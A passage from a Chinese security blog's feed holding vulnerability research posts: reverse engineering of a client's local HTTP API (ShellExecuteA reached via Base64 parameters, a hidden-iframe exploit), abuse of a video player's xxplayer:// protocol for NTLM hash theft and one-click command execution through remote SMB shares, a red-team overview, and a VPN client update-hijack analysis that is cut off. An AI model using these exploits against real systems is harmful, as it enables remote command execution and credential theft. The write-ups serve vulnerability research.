&lt;p&gt;双击进入字符串所在的&lt;code&gt;.RDATA&lt;/code&gt;节，我们就可以看到该字符串对应的交叉引用，那么接下来我们的工作就是&lt;strong&gt;进入这些函数看具体实现是否对的上响应报文的主体内容&lt;/strong&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680597537856.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我们进入一个函数查看，会发现在函数的头部代码中有如下这么一段内容，它的逻辑似乎就对应了HTTP响应报文的主体返回，通过字符串的对应我们能大致知道&lt;code&gt;sub_487760&lt;/code&gt;函数的作用就是为了将字符串解析到JSON格式中，然后再通过其他函数拼接JSON的字段内容给到&lt;code&gt;Block&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680633669819.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;除了我们跟进的这个函数外其他的函数逻辑都大致一样，并且我们通过IDA插件&lt;code&gt;CTO&lt;/code&gt;查看调用关系，发现这些函数最终都是被同一个函数&lt;code&gt;sub_674090&lt;/code&gt;调用。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680636918960.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;那我们再继续跟进函数&lt;code&gt;sub_674090&lt;/code&gt;，函数的逻辑就是根据不同的URI进入不同的函数处理，也就表示着这里就是HTTP请求逻辑处理的入口位置。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680638567124.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;有了请求处理逻辑的入口，接下来我们就要去看每个URI对应的处理逻辑是什么，看一下处理的逻辑中是否有参数值可控导致存在的相关漏洞。&lt;/p&gt;

&lt;p&gt;如果你觉得这样去看很累，也可以基于敏感函数的调用链来对应每个URI的处理函数，如下图所示我就基于&lt;code&gt;ShellExecuteA&lt;/code&gt;函数的调用链找到了URI&lt;code&gt;/api_install&lt;/code&gt;的对应处理函数，也就表示当你访问URL：&lt;code&gt;http://127.0.0.1:38230/api_install&lt;/code&gt;时很有可能就会触发&lt;code&gt;ShellExecuteA&lt;/code&gt;函数。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680696654183.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;那么我们可以跟进去看一下该处理函数，看看是否可以将可控参数值带入到&lt;code&gt;ShellExecuteA&lt;/code&gt;函数里去执行。&lt;/p&gt;

&lt;p&gt;在函数的一开始就判断运行当前程序的用户是否是&lt;code&gt;system&lt;/code&gt;，如果不是的话则直接返回响应内容（状态码500）提示当前不是以SYSTEM权限运行的进程。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680699571630.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里我们通过Process Hacker可以看到&lt;code&gt;UserClient.exe&lt;/code&gt;进程对应的用户就是&lt;code&gt;SYSTEM&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680700889509.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;也就表示我们当前是满足这个条件的，所以可以接着看IF分支内的逻辑。在IF分支内就执行了&lt;code&gt;ShellExecuteA&lt;/code&gt;函数，根据&lt;code&gt;ShellExecuteA&lt;/code&gt;函数的使用语法我们知道它这是以&lt;code&gt;v15&lt;/code&gt;作为参数执行&lt;code&gt;v16&lt;/code&gt;程序，所以我们需要知道&lt;code&gt;v15&lt;/code&gt;、&lt;code&gt;v16&lt;/code&gt;这两个变量是如何赋值而来的。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680708970258.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;具体的逻辑可以下图，我们找到赋值关系最终确认一切的参数来源都是&lt;code&gt;Block&lt;/code&gt;，该值是一个全局变量，那么根据当前的环境我们就可以猜测此处的来源就是HTTP请求参数。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16680711304718.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;根据猜测，我们可以先使用OD附加进程在&lt;code&gt;ShellExecuteA&lt;/code&gt;函数处下断点。&lt;/p&gt;

&lt;p&gt;然后请求URL：&lt;code&gt;http://127.0.0.1:38230/api_install?file=cmd.exe&amp;amp;param=/k%20notepad&lt;/code&gt;，我们就会在OD界面中看见端点到&lt;code&gt;ShellExecuteA&lt;/code&gt;函数了，我们可以通过栈来看一下传参是什么。&lt;/p&gt;

&lt;p&gt;如下所示我们发现&lt;code&gt;ShellExecuteA&lt;/code&gt;函数的参数&lt;code&gt;FileName&lt;/code&gt;和&lt;code&gt;Parameters&lt;/code&gt;是一串乱码的内容，这应该是我们输入的字符串经过了某些处理后导致的。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16681317190938.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;因此我们可以在URI&lt;code&gt;/api_install&lt;/code&gt;对应处理的函数起始位置下断点一步一步跟进看一下我们请求的参数值是否真的带进来了，如果带进来了为什么最终值会变成一段乱码的数据。&lt;/p&gt;

&lt;p&gt;如下图OD中可以看见我们的请求参数&lt;code&gt;file&lt;/code&gt;的值&lt;code&gt;cmd.exe&lt;/code&gt;确实可以带进来，这也就验证了我们的猜想，&lt;code&gt;ShellExecuteA&lt;/code&gt;函数的参数是来源于HTTP请求参数。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16681356708499.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接着走下去我们会发现调用如下函数时的参数就是我们的请求参数&lt;code&gt;file&lt;/code&gt;和对应值&lt;code&gt;cmd.exe&lt;/code&gt;，当该函数执行完成之后返回到EAX寄存器，我们跟进EAX寄存器的地址查看数据就会发现数据为乱码内容，也就是我们在&lt;code&gt;ShellExecuteA&lt;/code&gt;函数断点处看见的参数。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-asm&quot;&gt;push esi
push eax
call UserClie.004203B0
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16681358274356.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;所以我们可以跟进函数&lt;code&gt;004203B0&lt;/code&gt;在IDA中看一下它具体做了什么，这样我们才能构造请求让真正的字符串带入到&lt;code&gt;ShellExecuteA&lt;/code&gt;函数中执行。&lt;/p&gt;

&lt;p&gt;在这之前我们需要注意，由于IDA和实际进程执行的基址不同，我们可以在OD中找到进程基址然后将IDA对应的基址修改为进程的，这样我们就可以直接跟进函数&lt;code&gt;004203B0&lt;/code&gt;，而不需要再去进行地址的换算。&lt;/p&gt;

&lt;p&gt;在IDA中跟进函数&lt;code&gt;004203B0&lt;/code&gt;，它实际上也是调用的另外一个函数&lt;code&gt;00370C70&lt;/code&gt;，在该函数里对字符串进行位移转换，猜测可能是自定义的解码方式。但是在它进行遍历的过程中使用到了一段数组数据&lt;code&gt;word_74E940&lt;/code&gt;，我们跟进这个数据之后发现似乎是一张解码表。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16681457115844.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如下将整段数据罗列出来，看着与Base64解码所需要的解码表是一致的，所以此处极有可能就是Base64解码操作，将我们的输入的字符串&lt;code&gt;cmd.exe&lt;/code&gt;进行解码，最终就变成了乱码。&lt;/p&gt;

&lt;p&gt;我们可以将&lt;code&gt;cmd.exe&lt;/code&gt;字符串进行Base64解码，发现结果确实为我们之前所看到的乱码内容：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16681461174700.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;最终我们也就确定了这里的请求参数值是需要先进行Base64编码之后再带入请求的。因此我们可以构建出如下Exploit，当安装了该客户端的应用打开Exp代码对应页面时，即可以执行我们想要的命令。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;iframe src=&quot;http://127.0.0.1:38230/api_install?file=Y21kLmV4ZQ==&amp;amp;param=L2sgbm90ZXBhZA==&quot; width=&quot;0px&quot; height=&quot;0px&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028770589143.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h5 id=&quot;某视频软件客户端&quot;&gt;某视频软件客户端&lt;/h5&gt;

&lt;p&gt;通过URLProtocolView找到视频软件客户端注册的伪协议：&lt;code&gt;xxplayer://&lt;/code&gt;，通过字符串定位程序伪协议的处理功能点，也可以知道有哪些的伪协议路由。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028774570110.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028774924444.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;发现这里可以通过&lt;code&gt;xxplayer://action.cmd/xxx&lt;/code&gt;的方式来触发一些功能，所有功能列表如下所示：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;xxplayer://action.cmd/playShareVideo
xxplayer://action.cmd/play
xxplayer://action.cmd/downloadvideo
xxplayer://action.cmd/downloadpage
xxplayer://action.cmd/downloadShareVideo
xxplayer://action.cmd/createshortcut_url
xxplayer://action.cmd/createshortcut
xxplayer://action.cmd/activeHomepage
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;根据字面意思理解它的作用即可，这里我们一个一个带入请求尝试，发现当请求&lt;code&gt;createshortcut_url&lt;/code&gt;时会在桌面创建&lt;code&gt;.link&lt;/code&gt;的快捷方式文件。&lt;/p&gt;

&lt;p&gt;我们跟进这个创建快捷方式的逻辑，发现实际上它还有两个参数：&lt;code&gt;url&lt;/code&gt;、&lt;code&gt;name&lt;/code&gt;：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16756111480279.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;然后将这两个参数值带入&lt;code&gt;CreateUrlShortcut&lt;/code&gt;函数执行，这个函数是导入函数，就是用于创建桌面快捷方式的。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16756112003388.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;因此我们可以构建伪协议URL：&lt;code&gt;xxplayer://action.cmd/createshortcut_url?url=http://www.baidu.com&amp;amp;name=Test&lt;/code&gt;，访问就发现它创建了一个名为&lt;code&gt;Test&lt;/code&gt;的快捷方式，目标为：&lt;code&gt;C:\xxplayer.exe \UrlQuickLunch=http://www.baidu.com,0&lt;/code&gt;，也就表示我们传入的&lt;code&gt;url&lt;/code&gt;参数值变成了启动参数，&lt;code&gt;name&lt;/code&gt;参数值变成了快捷方式名字。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028772674438.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当我们双击这个快捷方式时，就会调用浏览器打开&lt;code&gt;http://www.baidu.com&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;接着我们发现只要&lt;code&gt;url&lt;/code&gt;参数值为&lt;code&gt;xxx://xxx.xxx/&lt;/code&gt;的格式即可，那么我们尝试将&lt;code&gt;url&lt;/code&gt;参数值修改为&lt;code&gt;file://172.16.176.176/netntlm&lt;/code&gt;，也就变成这样：&lt;code&gt;xxplayer://action.cmd/createshortcut_url?url=file://172.16.176.176/netntlm&amp;amp;name=123&lt;/code&gt;，在机器上&lt;code&gt;responder&lt;/code&gt;监听一下，当打开快捷方式时收到了NTLM Hash：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16756130536051.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;除了获取NTLM Hash，我们还可以在Ubuntu上开一个SMB服务，然后将&lt;code&gt;url&lt;/code&gt;参数设为使用&lt;code&gt;\\172.16.176.176\share\Test.exe&lt;/code&gt;，使用快捷方式打开共享文件，发现确实可以打开EXE文件，但是会有文件信任的安全警告（Mark-of-the-Web）。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16756160973381.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里可以通过&lt;code&gt;jar&lt;/code&gt;文件形式去绕过，打包一个打开计算器的Jar包放在共享目录下，然后将&lt;code&gt;url&lt;/code&gt;参数设为使用&lt;code&gt;\\172.16.176.176\share\1.jar&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16756162884409.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;访问&lt;code&gt;xxplayer://action.cmd/createshortcut_url?url=\\172.16.176.225\share\1.jar&amp;amp;name=123&lt;/code&gt;，创建快捷方式，打开快捷方式，执行Jar包启动计算器，这样我们就实现了1 Click执行任意命令。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028772455266.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;使用远程Jar包的方式来达到任意命令执行还是有局限性，如果目标机器不存在Java环境就无法执行，因此在对文件信任机制的研究发现在&lt;code&gt;smb&lt;/code&gt;共享文件中打开&lt;code&gt;zip&lt;/code&gt;压缩包内的&lt;code&gt;bat&lt;/code&gt;文件，不会有任何弹窗提示直接执行&lt;code&gt;bat&lt;/code&gt;文件内容。&lt;/p&gt;

&lt;p&gt;因此我们可以在共享文件夹中创建&lt;code&gt;1.zip&lt;/code&gt;，放入内容为&lt;code&gt;calc&lt;/code&gt;的&lt;code&gt;1.bat&lt;/code&gt;文件。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16756704688552.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;将&lt;code&gt;url&lt;/code&gt;参数值设为&lt;code&gt;\\172.16.176.225\share\1.zip\1.bat&lt;/code&gt;，然后访问&lt;code&gt;xxplayer://action.cmd/createshortcut_url?url=\\172.16.176.225\share\1.zip\1.bat&amp;amp;name=123&lt;/code&gt;创建桌面快捷方式，打开快捷方式即可执行&lt;code&gt;bat&lt;/code&gt;文件，最终达到不需要任何依赖的情况下执行任意命令。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028772348064.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;总结&quot;&gt;总结&lt;/h2&gt;

&lt;p&gt;简单总结一下以上两类客户端的攻击入口、RCE风险和影响面。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028779762348.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028780061810.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;关于客户端本地开启的网络协议问题，我总结出如下几步可以快速的进行漏洞发现:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;找到客户端启动的本地网络服务（TCP、UDP），这个可以用火绒剑或者CMD的方式查看；&lt;/li&gt;
  &lt;li&gt;有本地监听的情况下，找到对应的程序以及加载的DLL，通过IDA根据端口号找到监听的点，如果是C/C++的程序一般找bind这个函数就能快速定位到；&lt;/li&gt;
  &lt;li&gt;向上回溯找调用链，并根据网络服务的返回结果，例如HTTP访问会有一段字符串或者响应头的一些字符串，定位到代码处理逻辑；&lt;/li&gt;
  &lt;li&gt;如果逻辑对应上了，那就接着找程序的导入表是否存在敏感的函数，例如：CreateProcess、WinExec、ShellExec，如果存在则可以向上回溯看看是否与网络服务监听点有联系；&lt;/li&gt;
  &lt;li&gt;当条件都满足的时候就想尽办法，通过断点调试等操作，找传参或数据传输格式，看看可控内容是否可达敏感的函数处；&lt;/li&gt;
  &lt;li&gt;根据代码逻辑构造PoC触发漏洞，并尝试武器化利用。&lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id=&quot;致谢&quot;&gt;致谢&lt;/h2&gt;

&lt;p&gt;在文章的最后，我要感谢公司部门领导和同事对本议题的贡献和帮助（以下排名不分先后），感谢字节跳动安全中心对于本次沙龙的筹办和策划。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028782795487.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
</description>
          <pubDate>2023-12-18T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2023-12-18/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2023-12-18/1</guid>
        </item>
      
    
      
        <item>
          <title>我眼中的红队</title>
          <description>&lt;h1 id=&quot;我眼中的红队&quot;&gt;我眼中的红队&lt;/h1&gt;

&lt;p&gt;碎语闲谈，作为一名多年的十八线红队选手一直想写一篇文章来总结下“我眼中的红队”，之前写过一点，因文笔拙劣遂删除，起本文重写。&lt;/p&gt;

&lt;h2 id=&quot;什么是红队&quot;&gt;什么是红队&lt;/h2&gt;

&lt;p&gt;现如今是数字化时代，万物联网创造了一个新的空间，即网络空间，网络空间的安全也上升到了国家安全层面，并且网络已经成为国家继海、陆、空、天之后的第五大主权领域空间。&lt;/p&gt;

&lt;p&gt;正是如此，网络空间也就如传统领域空间一样，需要通过演习对抗的模式，提升网络安全防御能力，以攻促防，知攻善防。&lt;/p&gt;

&lt;p&gt;攻防双方在演习中通常称之为红队（Red Team）和蓝队（Blue Team），红队（Red Team）即攻击方，穷尽方法攻击以达到获取演习靶标权限的目的。&lt;/p&gt;

&lt;h2 id=&quot;红队攻击流程&quot;&gt;红队攻击流程&lt;/h2&gt;

&lt;p&gt;红队的攻击流程大致分为4个步骤，分别是制定战术、外网打点、内网横向、结果报告。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;制定战术&lt;/strong&gt;：根据演习规则及目标结合自身优点制定攻击战术，以保证演习过程不盲目、不混乱，有条不紊的完成演习；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;外网打点&lt;/strong&gt;：通过漏洞、供应链、社工、近源等手段对目标暴露面进行攻击，以此打开进入目标内网的入口；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;内网横向&lt;/strong&gt;：通过信息收集、分析、关联，结合相关漏洞及密码对内网可达网段机器进行横向攻击，以此发现更多脆弱点或接近内网的演习靶标；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;结果报告&lt;/strong&gt;：将红队攻击过程、所涉技术手段、攻击痕迹等信息进行整理，形成文档提交至演习平台，并且便于后续复盘。&lt;/p&gt;

&lt;h2 id=&quot;红队成员结构&quot;&gt;红队成员结构&lt;/h2&gt;

&lt;p&gt;通常在攻防演习中，主办方都是要求现场红队成员有三位，按照我的理解这三位应该是：队长、渗透师、横向师。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;队长&lt;/strong&gt;：技术综合能力较强，具备较好的团队协作、组织、应变、沟通能力，能有条理的安排演习任务，并且在演习结果上报后有争议时与裁判进行沟通；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;渗透师&lt;/strong&gt;：前渗透能力较强，也就是侧重于信息收集、Web漏洞黑盒挖掘及代码审计能力，在拿到目标信息后能够快速的找到脆弱资产，撕开暴露面入口以供后渗透；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;横向师&lt;/strong&gt;：后渗透能力较强，也就是侧重于木马免杀、权限维持及漏洞利用能力，当具有暴露面入口时能够通过它对内网进行持续性的脆弱点发现。&lt;/p&gt;

&lt;p&gt;当然，目标往往是美好的，现实却是残酷的，在演习中真正的红队成员都应该具备这三种能力，才能应对这万变的局面。&lt;/p&gt;

&lt;h2 id=&quot;红队基础设施&quot;&gt;红队基础设施&lt;/h2&gt;

&lt;p&gt;红队的基础设施，我将其分为三大块：人员、武器库、漏洞库。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;人员&lt;/strong&gt;：万事皆以人为本，红队的基础设施也离不开人，优秀的伙伴可以让你在演习过程中更舒心，而人员通常是最难解决的，大部分都是通过外部招聘的形式引入技术人才，或培养初入职场的学生；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;武器库&lt;/strong&gt;：武器库在我的理解中，就是一切皆自动化或自主化，信息收集、邮件钓鱼、木马免杀的自动化，以及C2、Webshell管理工具的自主化，这都是最基础的一些；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;漏洞库&lt;/strong&gt;：漏洞库即0day、1day这些漏洞的利用，例如SQL注入不应只是注入，而是要结合SQL注入直接获取目标站点权限，无论你是结合SQL注入获取密码再进入后台进行文件上传获取权限，还是SQL注入直接堆叠执行命令获取权限，简而言之，漏洞只是开始，通过漏洞获取权限才是漏洞库所需要的，这也是大家通常所说的漏洞武器化。&lt;/p&gt;

&lt;h2 id=&quot;红队结果复盘&quot;&gt;红队结果复盘&lt;/h2&gt;

&lt;p&gt;在进行一场演习之后，红队应结合演习结果进行复盘，主要围绕这几个方面：演习结果的总结、红队成员的分工、演习过程的问题。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;演习结果的总结&lt;/strong&gt;：对演习上报的结果进行总结，梳理出攻击技术及相关路径；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;红队成员的分工&lt;/strong&gt;：明确每个成员的分工，并且结合成果来看分工的落实程度；&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;演习过程的问题&lt;/strong&gt;：总结演习过程中发现的问题，找出问题产生的原因，有解决方案的提出解决方案，没有的就复盘会上进行交流。&lt;/p&gt;
</description>
          <pubDate>2022-08-18T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2022-08-18/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2022-08-18/1</guid>
        </item>
      
    
      
        <item>
          <title>某VPN客户端远程下载文件执行模拟逆向分析</title>
          <description>&lt;h1 id=&quot;某vpn客户端远程下载文件执行模拟逆向分析&quot;&gt;某VPN客户端远程下载文件执行模拟逆向分析&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;2021年3月，我通过黑盒的方式挖掘出某VPN客户端的远程下载文件执行漏洞，其原理就是通过VPN客户端本身所开启的Web服务API接口修改客户端更新请求地址，继而通过API控制客户端程序进行自动请求更新，导致客户端下载我自定义的更新程序，并运行。&lt;/p&gt;

&lt;p&gt;黑盒侧的漏洞挖掘往往带有许多的不确定性，所以我尝试从白盒（逆向）侧的角度去入手分析该漏洞的形成，并以此为基础形成对这种漏洞的模型记忆，并且在后续的研究中也用类似思路对其他VPN客户端进行漏洞挖掘，成果还算不错。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;注&lt;/strong&gt;：文中可能会存在笔误或描述不准确等错误，还望各位不吝赐教，多多斧正。&lt;/p&gt;

&lt;h2 id=&quot;黑盒侧&quot;&gt;黑盒侧&lt;/h2&gt;

&lt;p&gt;在正式逆向之前，建议读者先阅读一下黑盒侧的漏洞挖掘过程，如若读者已经熟知该漏洞，可越过该章节直接阅读「逆向侧」章节内容。&lt;/p&gt;

&lt;h3 id=&quot;漏洞回顾&quot;&gt;漏洞回顾&lt;/h3&gt;

&lt;p&gt;随便找一个地方下载VPN客户端下载安装。&lt;/p&gt;

&lt;p&gt;安装完之后访问VPN的页面，发现VPN会自动下载组件更新：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234406.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这之间也许是因为存在着某些联系，可以深入的看一下。&lt;/p&gt;

&lt;h4 id=&quot;对本地的访问&quot;&gt;对本地的访问&lt;/h4&gt;

&lt;p&gt;重现上述问题，通过&lt;code&gt;F12&lt;/code&gt;发现当访问VPN的登陆页面会对本地&lt;code&gt;127.0.0.1&lt;/code&gt;进行HTTP(s)请求：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234412.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这些请求均为GET请求并附带着一些参数，我把它一一列下来：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234418.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;本地来看一下这个&lt;code&gt;54530&lt;/code&gt;端口对应的进程是什么：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234423.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;发现这个端口是ECAgent.exe开启的，寻找到对应进程文件所在位置：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234430.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;确认这是XXX SSLVPN的程序，那么就可以将两者联系到一起，访问VPN登录首页会触发对&lt;code&gt;127.0.0.1&lt;/code&gt;的访问从而引起VPN进行组件更新。&lt;/p&gt;

&lt;h4 id=&quot;更新地址可控&quot;&gt;更新地址可控&lt;/h4&gt;

&lt;p&gt;通过以上的分析可以猜测整个大致流程，但我设想一下如果我可以控制本地的更新指向我的服务器，然后将更新的组件内容替换成恶意程序，当程序启动的时候就启动了恶意程序，这样我可以拿到安装VPN客户端的使用者PC权限。&lt;/p&gt;

&lt;p&gt;再回到之前的本地链接列表，根据对英文的理解，参数op的值应该为其具体对应要执行的动作：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;InitECAgent -&amp;gt; 初始化
GetEncryptKey -&amp;gt; 获取加密密钥
DoConfigure -&amp;gt; 配置
CheckReLogin -&amp;gt; 检查重新登录
CheckProxySetting -&amp;gt; 检查代理设置
UpdateControls -&amp;gt; 更新控制
DoQueryService -&amp;gt; 查询服务
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;第一个初始化的请求存在可控参数arg1：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;https://127.0.0.1:54530/ECAgent/?op=InitECAgent&amp;amp;arg1=XXX%20443&amp;amp;callback=EA_cb10000
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;参数&lt;code&gt;arg1=XXX%20443&lt;/code&gt;，对应值也就是HOST+空格+端口的格式，看到这里基本上就会有一个思路，客户端更新控件是不是根据这个指定值向其发送请求更新的呢？我可以只替换第一个初始化请求的arg1参数为&lt;code&gt;172.20.10.2 8000&lt;/code&gt;，然后本地搭建一个HTTP服务：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;python -m SimpleHTTPServer
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;其他的请求原封不动，依次请求一遍那一份URL列表（图为请求示例）：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234440.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;服务端成功收到请求，但是却出现了错误的提示：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234445.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;首先我已经验证了自己的猜想，更新地址是自己可控的，客户端确实会向我指定的服务端发送请求，但由于出现了错误，我不知道客户端访问了哪个文件，也不知道访问文件之后做了什么动作。&lt;/p&gt;

&lt;h4 id=&quot;服务搭建&quot;&gt;服务搭建&lt;/h4&gt;

&lt;p&gt;现在要做的就是搭建一个客户端可以正常访问的请求，通过这个错误大致可以知道，我搭建的服务端协议和客户端请求使用的协议不一致，本机抓个包发现客户端请求的是 HTTPS 协议，这就需要搭建一个 HTTPS 服务了。&lt;/p&gt;

&lt;p&gt;如下脚本基于Python库建立一个 HTTPS 服务：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer((&apos;0.0.0.0&apos;, 8000), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile=&apos;./server.pem&apos;, server_side=True)
httpd.serve_forever()
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;搭建起一个 HTTPS 环境后再次复现如上请求，服务端收到日志：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2021-05-05/Pasted%20image%2020211010234455.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;可以看见客户端会访问两个文件：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;/com/WindowsModule.xml
/com/win/XXXUD.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;先不管xml文件是怎么样的，可执行文件(exe)是需要重视的，但是这里通过提示可以看出客户端发出的请求是POST请求，但我所写的Python脚本建立的HTTPS服务并不支持POST方法，我需要重写一下Handler：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-python&quot;&gt;import BaseHTTPServer
import SimpleHTTPServer
import cgi
import ssl

class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_POST(self):
        form = cgi.FieldStorage()
